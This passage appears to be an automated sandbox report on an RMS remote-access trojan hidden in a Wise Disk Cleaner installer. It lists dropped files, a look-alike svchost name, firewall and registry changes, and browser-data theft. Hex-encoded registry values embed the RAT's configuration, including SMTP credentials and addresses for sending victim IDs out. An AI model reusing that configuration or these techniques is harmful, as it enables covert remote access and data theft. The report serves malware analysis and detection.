SHA512 2b0080337609bd458677532371a9226b9112edc9a1c8a6567423fd324559338c934ae409a012a903ca6f464281c327a812aefe932395d9e739ef8f0e379ebf28

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Polish.ini

MD5 1a59560e88582dac1e5b7a70a38463a5
SHA1 fe80e956dbf54bd066f2f11d697072377dd3df6b
SHA256 b826a3a9198323ce5b29ba96a311a632b98c05fbf4d02213abd30ce0ea262427
SHA512 0d00273db68c3ebb58f0be6102b1f23d2096197aacaa8577aa42473aa1b587f50c86f333c1831b78879b2ba5ab1793488af1f875ed111eb800a1b2c9becdf69e

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Persian.ini

MD5 71f1fe9e66926028a09b7a5ff36ec42a
SHA1 521a99b288ae887391c36fb86555e25df5685164
SHA256 8044110a96bbe6dcc5cc74fa8106a2ed250536ea8785b0eb1148a696c74c5353
SHA512 62c8b5c0eda2163d7093da06a176270558f377d0e7fc8fd2aea137045c5fdc4cf62be47fc2c215e2bf4d68ba8eb343ceb70bce1b991502ecd1407350dab086c5

memory/1516-161-0x0000000000000000-mapping.dmp

memory/1552-163-0x0000000000000000-mapping.dmp

memory/1936-168-0x0000000000000000-mapping.dmp

memory/756-169-0x0000000000000000-mapping.dmp

memory/972-167-0x0000000000000000-mapping.dmp

memory/1352-166-0x0000000000000000-mapping.dmp

memory/1664-170-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-04-17 07:06

Reported

2022-04-17 07:08

Platform

win10v2004-20220414-en

Max time kernel

152s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe"

Signatures

RMS

trojan rat rms

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\libeay32.dll C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A

Modifies Windows Firewall

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\software\avira\antivir desktop C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Key opened \REGISTRY\MACHINE\software\WOW6432Node\avira\antivir desktop C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\software\avira\antivirus C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Key opened \REGISTRY\MACHINE\software\avast software\avast C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Key opened \REGISTRY\MACHINE\software\WOW6432Node\avast software\avast C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\software\avast software\avast C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\P: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\U: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\Z: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\T: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\X: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\Y: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\E: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\K: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\M: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\R: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\W: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\F: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\G: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\L: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\S: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\Q: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\V: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\H: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\J: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\N: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\O: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\cmd.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-0U0TI.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GIIEQ.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-UDKEJ.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-MREEQ.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-8DFJB.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-GMTI7.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-N51AI.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GSJ0B.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-3AQ20.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-14VKG.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-4HH0U.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BNU1O.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GK4R7.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File opened for modification C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-8EFVN.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-P4SP7.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BP6IL.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-MLER0.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-9TT3J.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-IGT7O.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-E2B0R.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File opened for modification C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDefrag.dll C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-DHCCJ.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-MD2O1.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-JH35S.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-M4OGA.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-M4CQV.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-K6VJF.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2VUGG.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-49TVG.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-FH5O6.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File opened for modification C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File opened for modification C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File opened for modification C:\Program Files (x86)\Wise\Wise Disk Cleaner\LiveUpdate.exe C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-322D1.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-9LRK6.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-V5A52.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-JEUB2.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-3GB98.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2K8S9.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-FTJ4K.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-L99TI.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-8U5IC.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-N3GO7.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-AHPA0.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-PMEAD.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-FFP72.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-HS1UP.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.msg C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-ACAMM.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-O517D.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-1J6R4.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-J4T27.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-OIF4T.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-OQ2IF.tmp C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\WiseDiskCleaner.exe = "11000" C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
